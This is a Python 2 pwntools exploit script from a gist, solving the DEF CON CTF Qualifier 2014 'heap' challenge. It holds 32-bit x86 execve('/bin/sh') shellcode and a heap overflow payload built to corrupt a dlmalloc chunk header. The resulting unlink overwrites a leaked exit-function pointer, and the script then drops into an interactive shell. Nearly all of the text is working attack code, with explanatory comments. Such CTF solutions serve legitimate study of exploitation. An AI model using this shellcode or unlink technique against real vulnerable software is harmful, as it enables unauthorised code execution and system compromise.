@Tosainu
Last active February 2, 2017 19:15
#!/usr/bin/env python2
# DEF CON CTF Qualifier 2014: heap
# https://github.com/ctfs/write-ups-2014/blob/master/def-con-ctf-qualifier-2014/heap/README.md
#
# Python 2 / pwntools script (str payloads, xrange): drives the local challenge
# binary, parses the two addresses it prints, and answers the
# "Write to object [size=260]" prompt with a payload that is longer than the
# object.  The bytes past the 260-byte object land in the next chunk's header
# (dlmalloc 2.6.1 layout quoted further down), which has no fd/bk consistency
# checks; the allocator's unlink of that chunk is what the final three p32
# fields are aimed at.  Mitigation note: modern glibc's safe-unlinking checks
# (fd->bk == p && bk->fd == p) reject a header like this one.
from pwn import *
# Size of the heap object the program lets us write into (matches the
# "size=260" in the prompt waited for below).
padding = 260
# 32-bit x86 shellcode; the per-instruction comments give the encoding.
# NOTE: '\06' is an OCTAL escape (== '\x06'), not '\0' followed by '6' --
# do not "normalise" it.  The jmp skips the six NOPs that follow it.
shellcode = ''
shellcode += '\xeb\06' # jmp 0x08
shellcode += '\x90' * 6
shellcode += '\x31\xd2' # xor edx,edx
shellcode += '\x52' # push edx
shellcode += '\x68\x2f\x2f\x73\x68' # push 0x68732f2f
shellcode += '\x68\x2f\x62\x69\x6e' # push 0x6e69622f
shellcode += '\x89\xe3' # mov ebx,esp
shellcode += '\x52' # push edx
shellcode += '\x53' # push ebx
shellcode += '\x89\xe1' # mov ecx,esp
shellcode += '\x8d\x42\x0b' # lea eax,[edx+0xb]
shellcode += '\xcd\x80' # int 0x80
# Local target; swap for the remote() line to talk to a hosted instance.
r = process('./babyfirst-heap_33ecf0ad56efc1b322088f95dd98827c')
# r = remote('0.0.0.0', 4000)
# The binary leaks its own exit-handler pointer: "Exit function pointer is at 0x... "
# -- read up to the trailing space and parse the hex.
r.recvuntil('Exit function pointer is at ')
addr_exit_func_ptr = int(r.recvuntil(' '), 16)
log.info('addr_exit_func_ptr: 0x%x' % addr_exit_func_ptr)
# Skip 11 lines of output before the allocation listing.  The count is
# hard-coded from the challenge's banner -- TODO confirm against a live run
# if the binary's output ever changes.
for i in xrange(11):
    r.readline()
# The listing prints chunks as "[... loc=0x...]"; grab the hex after "loc="
# and drop the trailing ']' before parsing.  Presumably this is the object
# we write into below; verify with the README if in doubt.
r.recvuntil('loc=')
addr_writable_heap = int(r.recvuntil(']')[:-1], 16)
log.info('addr_writable_heap: 0x%x' % addr_writable_heap)
# http://gee.cs.oswego.edu/pub/misc/malloc-2.6.1.c
#
# struct malloc_chunk
# {
# size_t size; /* Size in bytes, including overhead. */
# struct malloc_chunk* fd; /* double links -- used only if free. */
# struct malloc_chunk* bk;
# size_t unused; /* to pad decl to min chunk size */
# };
# Wait for the write prompt, then build the over-long payload:
#   [shellcode][NOP pad to 260 bytes][size][fd][bk]
# The last three dwords overwrite the next chunk's header shown above.
r.recvuntil('Write to object [size=260]:\n')
payload = ''
payload += shellcode
payload += '\x90' * (padding - len(payload))
payload += p32(1) # size (mark next chunk freed)
# -8: fd is placed so that fd's bk field (offset 8 in the struct above)
# coincides with the leaked exit function pointer.
payload += p32(addr_exit_func_ptr - 8) # fd
payload += p32(addr_writable_heap) # bk
r.sendline(payload)
# Drain whatever the program prints after the write, then hand the
# connection to the user.
r.clean()
r.interactive()